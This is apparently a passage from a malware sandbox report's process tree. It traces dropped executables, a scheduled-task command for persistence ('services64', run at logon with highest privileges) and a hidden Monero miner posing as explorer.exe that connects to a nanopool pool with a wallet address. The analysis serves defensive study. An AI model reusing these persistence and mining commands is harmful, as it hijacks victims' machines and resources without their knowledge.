                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 244
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      PID:10580
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fnkpkf24.saq\autosubplayer.exe /S & exit
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:8916
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sat205eb4a2ece877a.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4932
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat205eb4a2ece877a.exe
                                                                                                                                                                                            Sat205eb4a2ece877a.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:1068
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:6000
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:5516
                                                                                                                                                                                                • C:\ProgramData\3411592.exe
                                                                                                                                                                                                  "C:\ProgramData\3411592.exe"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                  • C:\ProgramData\4888429.exe
                                                                                                                                                                                                    "C:\ProgramData\4888429.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:6352
                                                                                                                                                                                                    • C:\ProgramData\4888429.exe
                                                                                                                                                                                                      "C:\ProgramData\4888429.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:7016
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 1068
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                                    • C:\ProgramData\6470069.exe
                                                                                                                                                                                                      "C:\ProgramData\6470069.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:6336
                                                                                                                                                                                                    • C:\ProgramData\7625938.exe
                                                                                                                                                                                                      "C:\ProgramData\7625938.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:6920
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:4748
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4748 -s 1724
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      PID:5572
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5812
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2352
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1460
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:6564
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:4836
                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:1668
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:3652
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:3128
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6132
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe"
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:4848
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:1152
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:6324
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp" /SL5="$5028A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:6620
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:5000
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp" /SL5="$20336,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:3748
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe" ss1
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:5632
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:6480
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:6640
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:6764
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:1192
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sat20627fa1c49.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:5032
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20627fa1c49.exe
                                                                                                                                                                                                                      Sat20627fa1c49.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:4824
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 328
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5788
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sat20ed203af5.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:4696
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ed203af5.exe
                                                                                                                                                                                                                        Sat20ed203af5.exe
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:3968
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1389700.scr
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1389700.scr" /S
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6389059.scr
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6389059.scr" /S
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3379467.scr
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3379467.scr" /S
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:860
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\3379467.scr
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\3379467.scr"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4648
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1068
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5141881.scr
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5141881.scr" /S
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                            PID:5732
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sat2077373f11706fb7.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:884
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2077373f11706fb7.exe
                                                                                                                                                                                                                            Sat2077373f11706fb7.exe
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5040
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sat2026ef0d60b87a3f5.exe
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1152
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
                                                                                                                                                                                                                              Sat2026ef0d60b87a3f5.exe
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:4716
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5712
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sat20de8d8504.exe
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4632
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20de8d8504.exe
                                                                                                                                                                                                                                Sat20de8d8504.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5248
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 248
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Sat200240b71b.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:4160
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat200240b71b.exe
                                                                                                                                                                                                                                  Sat200240b71b.exe
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 260
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:4008
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Sat20545a92617f.exe /mixone
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1472
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20545a92617f.exe
                                                                                                                                                                                                                                    Sat20545a92617f.exe /mixone
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:3824
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 244
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sat20873bc74eb80e0.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                  PID:3600
                                                                                                                                                                                                                          • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                            C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            PID:4108
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe
                                                                                                                                                                                                                            Sat20873bc74eb80e0.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4792
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 1872
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:5668
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4824 -ip 4824
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3824 -ip 3824
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6120
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5248 -ip 5248
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:832
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5132 -ip 5132
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:5280
                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                              PID:4860
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:5528
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 456
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:1152
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5528 -ip 5528
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:5796
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 860 -ip 860
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:3892
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 388 -p 4748 -ip 4748
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:5848
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4792 -ip 4792
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6756
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6352 -ip 6352
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:1424
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6092 -ip 6092
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6168
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3652 -ip 3652
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6396
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5060 -ip 5060
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6576
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4280 -ip 4280
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:4276
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4288 -ip 4288
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:3544
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 520 -p 1152 -ip 1152
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:3852
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3060 -ip 3060
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              PID:6104
                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                              PID:4656
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5144 -ip 5144
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:860
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1912
                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                PID:5328
